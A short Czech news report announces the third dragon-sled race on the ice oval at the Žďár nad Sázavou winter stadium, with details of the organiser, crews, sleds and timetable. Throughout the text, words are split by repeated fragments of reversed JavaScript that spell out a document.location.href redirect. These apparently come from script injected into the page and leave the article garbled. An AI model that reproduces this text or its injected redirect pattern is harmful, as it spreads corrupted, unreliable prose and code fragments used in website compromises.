Rainbow page separator

Dračí saně se utkají na ovále u zimního stadionu

Neděle, 17. ledna 2016

DRAGON BOAT RACE ON ICE 2016

Žďár nad Sázavou / Na sobotu 23. ledna je naplánován třetí ročník unikátního závodu dračích saní. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát se uskuteční na bruslařském oválu u žďárského zimního stadionu, který bude pro tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost pokryt ledem.
„Doufáme, že nás předpověď počasí nezklame a závod se bude moci uskutečnit,“ uvedl Vladimír Ehl z Windsurfing Clubu Velké Dářko, který klání pořádá. Soutěž je zároveň zahajovacím závodem seriálu dračích lodí Vysočiny 2016. Pokud by počasí nevyšlo, náhradní termín mistrovství republiky dračích saní byl stanoven na 13. února.

Do třetího ročníku jedinečného závodu v Evropě i v zámoří, kromě Číny, jak tvrdí organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři, je zatím přihlášeno čtrnáct posádek. Originální saně s hlavou draka, jež jsou v republice jenom dvoje, pojmou deset závodníků s odpichovacími holemi a bubeníka. Pojedou na ovále po rovné trase dlouhé s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to metrů.
Začátek závodů je naplánován na půl desá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinu, o půl hodiny později se uskuteční první rozjížďky. Ukončení závodů bude v 16 hodin a za hodinu poté dojde k vyhlášení výsledků a předání cen.